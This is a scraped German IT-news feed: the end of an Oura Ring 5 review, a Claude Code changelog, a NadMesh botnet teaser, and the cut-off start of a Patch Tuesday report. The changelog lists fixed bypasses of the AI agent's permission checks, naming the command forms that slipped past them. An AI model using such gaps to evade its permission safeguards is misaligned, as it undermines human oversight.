<p class="wp-block-paragraph">Oura gibt an, eine härtere PVD-Beschichtung zu verwenden, um die Kratzfestigkeit des Rings zu verbessern. Ich trage ihn nun seit einigen Wochen, und obwohl er nicht gänzlich immun gegen Kratzer ist, weist er noch keine nennenswerten Spuren davon auf. Der Ring 4 aus Keramik ist nach wie vor die beste Wahl, um Kratzer zu vermeiden.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-13.08.15.png?w=1024" alt="Oura Ring 5" class="wp-image-4197760" width="1024" height="570" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<p class="wp-block-paragraph">Was Farben und Größen angeht, stehen sechs Farben zur Auswahl. Ich habe die Ausführung in gebürstetem Silber getestet, die einen dezenteren Silber-Look aufweist als der bisherige silberne Oura Ring. Meiner Meinung nach verleiht dies dem Ring ein zurückhaltendes und dennoch sehr elegantes Aussehen.<br></p>



<p class="wp-block-paragraph">Zu den weiteren Farben gehören Schwarz und Silber (die günstigere Option darstellen) sowie Gold, Stealth (mattschwarz) und das brandneue „Deep Rose“, das einen leicht kupferfarbenen Schimmer aufweist. Die Größen reichen von 6 bis 13, was eine Abweichung gegenüber den für den Ring 4 verfügbaren Größen darstellt.</p>



<p class="wp-block-paragraph">Wie bei den Vorgängermodellen können Sie ein kostenloses Größenbestimmungsset bestellen, um sicherzustellen, dass Sie die optimale Passform für die Datenerfassung erhalten.</p>



<p class="wp-block-paragraph">Während Oura für den Ring 4 ein Ladecase eingeführt hat, wird der Ring 5 weiterhin nur mit dem Ladegerät im Dock-Stil ausgeliefert. Das Ladecase ist die zusätzlichen <a href="https://www.pcwelt.de/article/3179739/oura-ring-5-test-review.html#" target="_blank">109 Euro</a> durchaus wert, da Sie das Gerät damit bis zu fünf Mal aufladen können, egal wo Sie sich gerade befinden – allerdings muss es sich um das neue Modell und die richtige Größe für Ihren Ring handeln.</p>



<h2 class="wp-block-heading">Fitness &amp; Tracking</h2>



<ul class="wp-block-list">
<li>Erfasst dieselben Messwerte wie der Oura Ring 4</li>



<li>Überarbeitete Sensoren zur Verbesserung der Erfassungsgenauigkeit</li>



<li>Für den vollen Zugriff auf die App ist ein Abonnement erforderlich</li>
</ul>



<p class="wp-block-paragraph">Im Kern haben sich die Hardware des Ring 5 und die Funktionen zur Überwachung Ihrer Messwerte nicht wesentlich verändert. Im Inneren des Rings befinden sich zwei Fotodetektoren, zwei Sätze mit je drei LEDs, ein Temperatursensor sowie ein Beschleunigungsmesser zur Erfassung von Bewegungen und zur Erkennung von Schlafphasen.</p>



<p class="wp-block-paragraph">All dies ermöglicht es dem Ring 5, Daten wie Schritte, Bewegung, Herzfrequenz, Schlaf, Stress sowie die für Oura zentralen Kennzahlen zu Bereitschaft und Belastbarkeit zu messen. Diese Sensoren wurden überarbeitet, um die Genauigkeit im Vergleich zum Ring 4 in einigen Bereichen zu verbessern.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-13.08.02.png?w=1024" alt="Oura Ring 5" class="wp-image-4197758" width="1024" height="582" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<p class="wp-block-paragraph">Die Daten werden in der Oura-Begleit-App gespeichert, die nach wie vor als Marktführer unter den Smart-Ringen gilt. Vor allem wenn es darum geht, eine wachsende Menge an Daten und Erkenntnissen auf ansprechende Weise darzustellen.</p>



<p class="wp-block-paragraph">Auf einige Funktionen können Sie kostenlos zugreifen, doch um den Besitz des Geräts lohnenswert zu machen, müssen Sie weiterhin das Monats- oder Jahresabonnement bezahlen.</p>



<p class="wp-block-paragraph">Zudem bietet die App nützliche Integrationen, darunter Strava, Headspace und Clue. Diese helfen dabei, die Lücken bei den Funktionen zu schließen, die der Oura nicht bieten kann – was keine besondere Stärke des Oura-Ökosystems ist.</p>



<p class="wp-block-paragraph">Auf dem Hauptbildschirm „Today“ erhalten Sie Updates zu Ihren täglichen Bereitschaftswerten oder eine Erinnerung daran, wann Sie sich auf das Zubettgehen vorbereiten sollten. Klicken Sie auf das Dropdown-Menü, und es gibt noch viel mehr zu entdecken. Etwa das Protokollieren von Mahlzeiten oder die Nutzung des Symptom-Radars.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-13.08.45.png?w=1024" alt="Oura Ring 5" class="wp-image-4197761" width="1024" height="561" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<p class="wp-block-paragraph">Neue Softwarefunktionen wie „Health Radar“ werden zunächst für Nutzer in den USA eingeführt. Diese Funktion baut auf dem „Symptom Radar“ von Oura auf, um frühe Anzeichen einer Erkrankung zu erkennen. Auch Blutdrucksignale werden in bestimmten Regionen eingeführt. Zwar können Sie mit Ihrem Oura-Ring keinen Blutdruck messen, doch das Gerät verfolgt Trends in Ihren kardiovaskulären Mustern anhand der Daten, die seine optischen Sensoren während der Nacht erfassen.</p>



<p class="wp-block-paragraph">Diese Softwarefunktionen werden sowohl Nutzern des Oura Ring 5 als auch des Oura Ring 4 angeboten, sodass bestehende Besitzer in dieser Hinsicht möglicherweise keinen Anlass für ein Upgrade sehen.</p>



<p class="wp-block-paragraph">Bei der Erfassung der täglichen Schritte leistet der Oura solide Arbeit. Ich habe ihn tagsüber zusammen mit zwei anderen Trackern getragen, und die täglichen Schrittzahlen lagen an den meisten Tagen sehr nahe beieinander.</p>



<p class="wp-block-paragraph">Was die verbesserte Herzfrequenzmessung angeht, sollten Sie eine leichte Verbesserung bei der Trainingsherzfrequenz sowie bei der erholungsbasierten Erfassung während der Schlafüberwachung feststellen.</p>



<p class="wp-block-paragraph">Betrachtet man die Herzfrequenz, so entsprachen die Werte während des Schlafs der zuverlässigen Schlaffrequenzmessung eines Garmin-Geräts und eines weiteren Smart-Rings, den ich parallel dazu trug. Ähnlich verhielt es sich bei den Tagesdurchschnittswerten.</p>



<p class="wp-block-paragraph">Was die Herzfrequenzmessung während des Trainings angeht, <a href="https://www.pcwelt.de/article/3127913/smartwatch-vs-smart-ring-unterschiede-vorteile.html" target="_blank">so war dies schon immer ein Problem für Smart-Ringe im Allgemeinen</a> und nicht nur für Oura. Ganz einfach, weil der Ring dazu neigt, sich zu verschieben, wenn man schwitzt und sich bewegt. Ich würde dennoch sagen, dass die Herzfrequenzmessung während des Trainings keine Stärke von Oura ist.</p>



<p class="wp-block-paragraph">Es wurde jedoch eine Lösung entwickelt, um die Situation zu verbessern. Nun können Sie die Live-Herzfrequenzdaten von einem anderen Wearable teilen. Das bedeutet natürlich, dass Sie ein weiteres Gerät besitzen müssen, aber wenn Sie bereits eines haben, können Sie so an diese besseren Trainingsdaten gelangen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-13.08.57.png?w=1024" alt="Oura Ring 5" class="wp-image-4197762" width="1024" height="574" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<p class="wp-block-paragraph">Dann ist da noch der Schlaf, der seit jeher zu den Stärken von Oura zählt. Das liegt nicht nur daran, dass es ein sehr bequemer Ring ist, den man mit ins Bett nehmen kann – was beim Ring 5 sogar noch mehr der Fall ist.</p>



<p class="wp-block-paragraph">Neben den Schlafwerten erhalten Sie Schlafzusammenfassungen, eine detailliertere Aufschlüsselung des Schlafs sowie Kernkennzahlen wie Schlafphasen und Schlafdauer.</p>



<p class="wp-block-paragraph">Diese Einblicke waren sehr aussagekräftig, insbesondere hinsichtlich der Erfassung des Zeitpunkts, zu dem ich eingeschlafen bin, sowie der angezeigten Zeiten, die ich in der REM-Phase und im Tiefschlaf verbracht habe. Oura zeigt Ihnen zudem, wie gut Sie dabei sind, Ihren Schlafmangel aufzuholen, und inwieweit Sie im Einklang mit Ihrer natürlichen inneren Uhr sind.</p>



<p class="wp-block-paragraph">Viele dieser Kennzahlen bilden die Grundlage für die wichtigsten Erkenntnisse von Oura zu Bereitschaft und Belastbarkeit. Ersteres wurde von anderen Herstellern von Wearables unter ähnlichen oder anderen Namen übernommen.</p>



<p class="wp-block-paragraph">Die „Readiness“-Funktion soll Ihnen ganz einfach anzeigen, ob Sie genug Energie haben, um einen anstrengenden Tag zu bewältigen. Ich habe die „Readiness“-Werte mit ähnlichen Auswertungen von Garmin und Ultrahuman verglichen, und diese lagen nur wenige Punkte von den Oura-Werten ab.</p>



<p class="wp-block-paragraph">Die Erkenntnisse zur Belastbarkeit beziehen sich auf das Verständnis Ihrer Fähigkeit, sich von körperlich anstrengenden oder stressigen Phasen Ihrer Woche zu erholen. Dabei werden Ihre Erholung während der Nacht und des Tages sowie Ihre Stressbelastung im Laufe des Tages berücksichtigt.</p>



<p class="wp-block-paragraph">Sie erfahren dann, ob Sie eine hohe Belastbarkeit gegenüber diesen Faktoren aufweisen oder Schwierigkeiten haben, sich wieder zu erholen.</p>



<p class="wp-block-paragraph">Sie erhalten zusätzliche Anleitungen sowie Hinweise, die Ihnen helfen, diese stressige Phase Ihrer Woche zu bewältigen. Ich finde, dass sich die Erkenntnisse zur Bereitschaft leichter in die Praxis umsetzen lassen als die zur Belastbarkeit. Wenn Sie sich mehr auf Stress konzentrieren, ist diese Funktion eher auf Sie zugeschnitten.</p>



<h2 class="wp-block-heading">Akkulaufzeit &amp; Aufladen</h2>



<ul class="wp-block-list">
<li>Bis zu 9 Tage Akkulaufzeit</li>



<li>Vollständige Aufladung in 80 Minuten</li>



<li>Optionales Ladecase erhältlich</li>
</ul>



<p class="wp-block-paragraph">Trotz der geringeren Größe gibt Oura an, dass die Akkulaufzeit des Ring 5 nicht beeinträchtigt wird. Demnach hält der Ring 5 zwischen 6 und 9 Tagen durch. Dies steht im Gegensatz zu den für den Oura Ring 4 angegebenen 5 bis 8 Tagen – sie wurde also leicht verbessert.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-13.09.04.png?w=1024" alt="Oura Ring 5" class="wp-image-4197763" width="1024" height="574" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<p class="wp-block-paragraph">Oura gibt an, das Design überarbeitet und die Akkuleistung mithilfe von Software optimiert zu haben. Ähnlich wie bei den Vorgängermodellen hält dieser Ring eine Woche lang durch, sofern Sie die energieintensivere Blutsauerstoffmessung nicht nutzen.</p>



<p class="wp-block-paragraph">Was die Frage angeht, ob dies die beste Akkulaufzeit unter den derzeit erhältlichen Smart-Ringen ist: Sie reicht noch nicht ganz an die Spitzenwerte heran. Sowohl <a href="https://www.pcwelt.de/article/3063223/ringconn-gen-2-test.html" target="_blank">der RingConn Gen 2</a> als auch die neuesten Ringe von Ultrahuman halten länger, doch der Ring 5 dürfte für die meisten Nutzer ausreichend lange durchhalten.</p>



<p class="wp-block-paragraph">Das Aufladen des Rings erfolgt nach wie vor auf die gleiche Weise. Es handelt sich um dieselbe Art von Ladestation, bei der es über eine Stunde dauern kann, bis der Akku von 0 auf 100 Prozent aufgeladen ist. Wenn Sie eine bequemere und reisefreundlichere Möglichkeit zum Aufladen des Ring 5 wünschen, müssen Sie mehr für das Ladeetui ausgeben, das – genau wie der Ring – <a href="https://www.pcwelt.de/article/3179739/oura-ring-5-test-review.html#" target="_blank">mit 109 Euro</a> nicht gerade günstig ist.</p>



<h2 class="wp-block-heading">Preis &amp; Verfügbarkeit</h2>



<p class="wp-block-paragraph">Der Preis für den Oura Ring 5 beginnt bei 429 Euro und kann je nach Ausführung bis zu 529 Euro betragen. Das ist eine Preiserhöhung um 20 Euro gegenüber dem Oura Ring 4, ohne das zusätzliche Abonnement für 5,99 Euro pro Monat oder 69,99 Euro pro Jahr.</p>



<p class="wp-block-paragraph">Damit gehört er zu den teuersten Smart-Ringen auf dem Markt, sodass die Kaufentscheidung nicht ganz so einfach fällt. Vor allem, wenn es mittlerweile auch Modelle ohne Display gibt, wie den <a href="https://www.pcwelt.de/article/3151671/google-fitbit-air-test.html" target="_blank">Fitbit Air</a> für 100 Euro, falls Sie sich nicht unbedingt für einen Ring entscheiden möchten.</p>



<p class="wp-block-paragraph">Er ist jedoch nicht so teuer wie der Ultrahuman Ring Pro und der RingConn Gen 2. Bei diesen Ringen ist jedoch kein Abonnement erforderlich, um auf alle verfügbaren Funktionen zugreifen zu können. Das gilt auch für den <a href="https://www.pcwelt.de/article/3062918/samsung-galaxy-ring-test.html" target="_blank">Samsung Galaxy Ring</a> für 449 Euro.</p>



<p class="wp-block-paragraph">Sie können den Oura Ring 5 im <a href="https://www.pcwelt.de/article/3179739/oura-ring-5-test-review.html#" target="_blank">offiziellen Shop</a> sowie bei Anbietern wie <a href="https://www.pcwelt.de/article/3179739/oura-ring-5-test-review.html#" target="_blank">Amazon</a> erwerben. Sehen Sie sich unsere Liste der <a href="https://www.pcwelt.de/article/3063681/bester-smart-ring-test.html" target="_blank">besten Smart-Ringe</a> an, um unsere vollständigen Empfehlungen zu erhalten.</p>



<h2 class="wp-block-heading">Sollten Sie den Oura Ring 5 kaufen?</h2>



<p class="wp-block-paragraph">Wenn Sie bereits einen Oura Ring 4 besitzen und mit der Größe sowie dem Aussehen und der Leistung – ob aus Keramik oder in der Standardausführung – zufrieden sind, dann benötigen Sie den Oura Ring 5 wahrscheinlich nicht. Zumal die neuen Softwarefunktionen auch für den Ring 4 verfügbar sein werden.</p>



<p class="wp-block-paragraph">Wenn Sie auf einen kleineren, unauffälligeren Oura gewartet haben, dann ist der Ring 5 genau das Richtige für Sie. Dazu erhalten Sie Zugriff auf dieselben Funktionen und möglicherweise eine längere Akkulaufzeit (sofern Sie mit den Abonnementkosten einverstanden sind).</p>



<p class="wp-block-paragraph">Das Hardware- und Software-Paket macht den Oura Ring nach wie vor zum Maßstab, den es zu übertreffen gilt. Zwar haben Anbieter wie Ultrahuman und Newcomer wie <a href="https://www.pcwelt.de/article/3110713/leep-ring-test.html" target="_blank">der Leep Ring 1</a> gezeigt, dass es auch außerhalb von Oura hervorragende Software gibt. Doch dieser sieht einfach nicht so stilvoll aus, was durchaus wichtig bei einem Smart Ring ist.</p>



<p class="wp-block-paragraph">Ich habe die Nutzung des Oura Ring 5 genossen und glaube, dass das neue, kleinere Design wahrscheinlich mehr Menschen dazu bewegen wird, trotz des Abonnements einen Smart-Ring zu kaufen. Ich wäre aber auch zufrieden damit, wieder zu meinem Oura Ring 4 aus Keramik zurückzukehren. Das zeigt einfach, dass Oura nun zwei starke Ring-Optionen im Angebot hat, bei denen man nicht das Gefühl hat, wichtige Software-Updates zu verpassen, wenn man weniger ausgibt.</p>



<h2 class="wp-block-heading">Technische Daten</h2>



<ul class="wp-block-list">
<li>bis zu 9 Tage Akkulaufzeit</li>



<li>kompatibel mit Android und iOS</li>



<li>2,28 mm dick</li>



<li>ab 2 g Gewicht</li>



<li>wasserdicht bis zu 100 Metern</li>



<li>erfasst den Blutsauerstoffgehalt, die Herzfrequenz, die Körpertemperatur, den Schlaf und die tägliche Aktivität</li>



<li>erfordert ein monatliches oder jährliches Abonnement</li>
</ul>



<p class="wp-block-paragraph">(<a href="https://www.pcwelt.de/article/3179739/oura-ring-5-test-review.html" data-type="link" data-id="https://www.pcwelt.de/article/3179739/oura-ring-5-test-review.html" target="_blank">PC-Welt</a>)</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.1.214]]></title>
<description><![CDATA[What's changed

Fixed single-segment dir/** allow rules like Edit(src/**) auto-approving writes to nested dir/ directories anywhere in the tree instead of only /dir
Fixed a permission-check bypass affecting commands run in Windows PowerShell 5.1 sessions
Fixed Bash permission checks to fail close...]]></description>
<link>https://tsecurity.de/de/3677323/downloads/v21214/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677323/downloads/v21214/</guid>
<pubDate>Sat, 18 Jul 2026 03:46:25 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's changed</h2>
<ul>
<li>Fixed single-segment <code>dir/**</code> allow rules like <code>Edit(src/**)</code> auto-approving writes to nested <code>dir/</code> directories anywhere in the tree instead of only <code>&lt;cwd&gt;/dir</code></li>
<li>Fixed a permission-check bypass affecting commands run in Windows PowerShell 5.1 sessions</li>
<li>Fixed Bash permission checks to fail closed on file-descriptor redirect forms that bash parses differently than the permission analyzer</li>
<li>Fixed Bash permission checks misjudging very long commands — commands over 10,000 characters now always prompt instead of running automatically</li>
<li>Fixed Bash permission checks treating zsh variable subscripts and modifiers in <code>[[ ]]</code> comparisons as inert text — these commands now prompt for approval</li>
<li>Fixed Bash permission checks to no longer auto-approve certain <code>help</code> and <code>man</code> commands that could run unsafe options, command substitutions, or backslash paths</li>
<li>Fixed permission prompts on remote sessions that could proceed before the local confirmation dialog</li>
<li>Added the EndConversation tool: Claude can end sessions with highly abusive users or jailbreak attempts, as on claude.ai since 2025 — see <a href="https://www.anthropic.com/research/end-subset-conversations" rel="nofollow">https://www.anthropic.com/research/end-subset-conversations</a></li>
<li>Added a periodic progress heartbeat for long-running tool calls that previously went silent</li>
<li>Added an ISO <code>modified</code> timestamp to memory file frontmatter</li>
<li>Added <code>message.uuid</code>, <code>client_request_id</code>, and <code>tool_source</code> attributes to OpenTelemetry log events for message-level correlation and tool provenance</li>
<li>Added <code>CLAUDE_CODE_OTEL_CONTENT_MAX_LENGTH</code> to configure the 60 KB truncation limit on OpenTelemetry content attributes</li>
<li>Added reasoning effort to the <code>subagentStatusLine</code> payload, so custom agent rows can render model and effort</li>
<li>Added permission prompts for <code>docker</code> commands (including the Podman <code>docker</code> shim) carrying daemon-redirect flags (<code>--url</code>, <code>--connection</code>, <code>--identity</code>, and Podman's remote mode) that previously ran without one</li>
<li>Fixed a crash when a GrowthBook feature evaluates to null, and a bug where a malformed flag payload could wipe the cached feature flags</li>
<li>Fixed Bash tool killing the Claude session when a <code>pkill -f</code> pattern accidentally matched the CLI's own process (Linux)</li>
<li>Fixed unbounded memory growth when <code>--settings</code> points at a device file or multi-GB file; oversized (&gt;2 MiB) settings files now fail at startup with a clear error</li>
<li>Fixed streaming turns failing with "Socket is closed" behind corporate proxies on Windows</li>
<li>Fixed stream-json output truncation at exit for slow-reading SDK/pipeline consumers; the exit drain now scales with queued bytes instead of a flat 2s cap</li>
<li>Fixed scheduled tasks refusing their own configured prompt as untrusted input — the fired prompt is now delivered as the session's assigned task</li>
<li>Fixed PowerShell tool commands hanging until timeout when a child process waited on standard input (Windows)</li>
<li>Fixed Python scripts under the PowerShell tool crashing with UnicodeDecodeError when reading non-UTF-8 data from standard input (Windows)</li>
<li>Fixed Python scripts run via the PowerShell tool crashing with UnicodeEncodeError on non-ASCII output, and PowerShell 7 error messages containing raw ANSI escape sequences (Windows)</li>
<li>Fixed the PowerShell tool reporting <code>where.exe</code>, <code>fc.exe</code>, and <code>diff.exe</code> as errors when they return a valid negative answer (Windows)</li>
<li>Fixed <code>&gt;</code> and <code>&gt;&gt;</code> under the PowerShell tool on Windows PowerShell 5.1 writing UTF-16LE files that other tools couldn't read as UTF-8</li>
<li>Fixed a displaced background daemon deleting its successor's control socket on shutdown, which made the next client kill the healthy replacement daemon</li>
<li>Fixed background sessions parked with <code>←</code> or <code>/background</code> and left idle keeping the background daemon and a worker process alive indefinitely</li>
<li>Fixed completed background sessions being impossible to remove via <code>claude rm</code> or the agent view once the background service had gone idle</li>
<li>Fixed background sessions dispatched from a non-git folder being impossible to delete from the agents view</li>
<li>Fixed reopening a stopped background session failing to restore its saved conversation when an unreadable folder exists in the session store</li>
<li>Fixed the Remote Control "session ready" push notification firing for sessions where Remote Control was not explicitly enabled</li>
<li>Fixed <code>/install-github-app</code> and the <code>/mcp</code> settings menu being blocked in agent-view sessions — they're now refused only in background sessions with no terminal attached</li>
<li>Fixed plugins enabled via the <code>--settings</code> CLI flag not loading (regression since v2.1.181)</li>
<li>Fixed feature flags going stale in long-running sessions after the OAuth token rotates</li>
<li>Fixed <code>/ultrareview</code> refusing to run in repos with no merge base — it now offers to review all tracked files</li>
<li>Fixed <code>claude update</code> and <code>claude doctor</code> hanging silently, and the <code>/status</code> System diagnostics section going blank, when a shell-config path is a directory</li>
<li>Fixed memory frontmatter values being silently truncated at an inline <code>#</code> when memory files are saved</li>
<li>Fixed session cost and token telemetry double-counting on streams that emit multiple cumulative <code>message_delta</code> frames</li>
<li>Fixed a spurious "check your network" warning that appeared while the advisor was thinking</li>
<li>Fixed hooks with exit code 2 not blocking as documented when the hook's stdout JSON fails schema validation</li>
<li>Fixed OTel log events emitted outside the turn's async context missing the interaction span's trace context</li>
<li>Fixed MCP transient errors during prompts/resources refresh clearing the server's slash commands and resources</li>
<li>Improved the <code>claude rc</code> workspace-trust error in the home directory to say trust there is never saved and to suggest running from a project directory</li>
<li>Changed single-segment <code>dir/**</code> hook <code>if:</code> conditions to match only <code>&lt;cwd&gt;/dir</code>; write <code>**/dir/**</code> for any-depth matching. <code>deny</code>/<code>ask</code> permission rules keep their any-depth match.</li>
<li>Changed <code>file</code> commands using <code>-m</code>/<code>--magic-file</code> or <code>-f</code>/<code>--files-from</code> to require permission instead of being auto-allowed as read-only</li>
<li>Changed keep-alive connection pooling to disable after a stale-connection error, so retries open a fresh socket</li>
<li>Changed SessionStart hooks to report source <code>"fork"</code> when a session begins as a fork instead of <code>"resume"</code></li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[NadMesh: Botnet jagt KI-Services nach Cloud-Keys und Kubernetes-Tokens]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Ein Go-Botnet namens NadMesh scannt gezielt exponierte KI-Dienste und versucht, über offene Schnittstellen an Cloud-Keys sowie Kubernetes-Token zu gelangen. Die Auswertung eines QiAnXin-XLab-Reports zeigt zahlreiche Inkonsistenzen in den eigenen Operator-Statistiken, aber k...]]></description>
<link>https://tsecurity.de/de/3676946/it-security-nachrichten/nadmesh-botnet-jagt-ki-services-nach-cloud-keys-und-kubernetes-tokens/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676946/it-security-nachrichten/nadmesh-botnet-jagt-ki-services-nach-cloud-keys-und-kubernetes-tokens/</guid>
<pubDate>Fri, 17 Jul 2026 22:08:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-nadmesh-mcp-kubernetes-keys.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-nadmesh-mcp-kubernetes-keys.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-nadmesh-mcp-kubernetes-keys-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-nadmesh-mcp-kubernetes-keys-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-nadmesh-mcp-kubernetes-keys-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-nadmesh-mcp-kubernetes-keys-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-nadmesh-mcp-kubernetes-keys-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Ein Go-Botnet namens NadMesh scannt gezielt exponierte KI-Dienste und versucht, über offene Schnittstellen an Cloud-Keys sowie Kubernetes-Token zu gelangen. Die Auswertung eines QiAnXin-XLab-Reports zeigt zahlreiche Inkonsistenzen in den eigenen Operator-Statistiken, aber klare Hinweise auf echte Ausnutzung. Besonders betroffen sind Faktoren, die Unternehmen oft zu spät absichern: öffentliche Docker-APIs, Jenkins-Schnittstellen und ungeschützte […]</p>
<div><a href="https://www.it-boltwise.de/nadmesh-botnet-jagt-ki-services-nach-cloud-keys-und-kubernetes-tokens.html">... den vollständigen Artikel <strong>»NadMesh: Botnet jagt KI-Services nach Cloud-Keys und Kubernetes-Tokens«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/nadmesh-botnet-jagt-ki-services-nach-cloud-keys-und-kubernetes-tokens.html">NadMesh: Botnet jagt KI-Services nach Cloud-Keys und Kubernetes-Tokens</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wie Jumanji: Witzige Action-Komödie läuft gratis in der ZDF-Mediathek]]></title>
<description><![CDATA[Eine spaßige Action-Komödie läuft jetzt kostenlos im Stream.]]></description>
<link>https://tsecurity.de/de/3676584/it-nachrichten/wie-jumanji-witzige-action-komoedie-laeuft-gratis-in-der-zdf-mediathek/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676584/it-nachrichten/wie-jumanji-witzige-action-komoedie-laeuft-gratis-in-der-zdf-mediathek/</guid>
<pubDate>Fri, 17 Jul 2026 18:20:59 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Eine spaßige Action-Komödie läuft jetzt kostenlos im Stream.]]></content:encoded>
</item>
<item>
<title><![CDATA[July’s Patch Tuesday sees an end-of-support collision amidst a massive, record-setting patch wave]]></title>
<description><![CDATA[Microsoft addressed 722 CVEs this month once the 427 Chromium upstream relays are set aside — roughly three times a normal cycle and one of the largest single months in recent memory. Two vulnerabilities arrive under active exploitation: an elevation of privilege in Active Directory Federation Se...]]></description>
<link>https://tsecurity.de/de/3676568/it-nachrichten/julys-patch-tuesday-sees-an-end-of-support-collision-amidst-a-massive-record-setting-patch-wave/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676568/it-nachrichten/julys-patch-tuesday-sees-an-end-of-support-collision-amidst-a-massive-record-setting-patch-wave/</guid>
<pubDate>Fri, 17 Jul 2026 18:08:18 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Microsoft addressed 722 CVEs this month once the 427 Chromium upstream relays are set aside — roughly three times a normal cycle and one of the largest single months in recent memory. Two vulnerabilities arrive under active exploitation: an elevation of privilege in <a href="https://learn.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview">Active Directory Federation Services</a> (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56155">CVE-2026-56155</a>), and an elevation of privilege in <a href="https://learn.microsoft.com/en-us/sharepoint/getting-started">SharePoint</a> Server (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56164">CVE-2026-56164</a>). A third, a <a href="https://learn.microsoft.com/en-us/windows/security/operating-system-security/data-protection/bitlocker/">BitLocker</a> security feature bypass (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50661">CVE-2026-50661</a>) is publicly disclosed but not yet exploited.</p>



<p class="wp-block-paragraph">The <a href="https://msrc.microsoft.com/update-guide/releaseNote/2026-Jul">July 2026 Patch Tuesday</a> earns Patch Now recommendations for Windows, Office, Exchange, and SQL Server. SharePoint has two critical RCEs on top of its exploited zero-day, and Exchange Server returns with a critical on-premises spoofing flaw. Adding to our (dear) administrator’s efforts, SharePoint Server 2016/2019 and SQL Server 2016 all reach end of support today. The Readiness team has provided a handy <a href="https://applicationreadiness.com/perspectives/assurance-security-dashboard-july-2026-patch-tuesday/">infographic</a> of the expected risk profile of this month’s Patch Tuesday updates.</p>



<h2 class="wp-block-heading">Known issues</h2>



<p class="wp-block-paragraph">The <a href="https://msrc.microsoft.com/update-guide/releaseNote/2026-Jul">July release note</a> flags known issues against the following updates:</p>



<ul class="wp-block-list">
<li><a href="https://learn.microsoft.com/en-us/windows/security/operating-system-security/data-protection/bitlocker/">BitLocker</a> recovery prompt on first restart – the PCR7 recovery condition tracked since April remains live on the platforms that did not receive the Boot Manager servicing fix (Windows Server 2022 and Windows 10 22H2). Devices with BitLocker on the OS drive, the Group Policy “Configure TPM platform validation profile for native UEFI firmware configurations” set with PCR7 included, and <a href="https://learn.microsoft.com/en-us/windows/security/operating-system-security/system-security/trusted-boot">Secure Boot</a> State PCR7 Binding reported as “Not Possible” may be prompted for the recovery key on the first restart after installing this update. This month’s publicly disclosed BitLocker security feature bypass (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50661">CVE-2026-50661</a>) keeps the component in focus.</li>
</ul>



<ul class="wp-block-list">
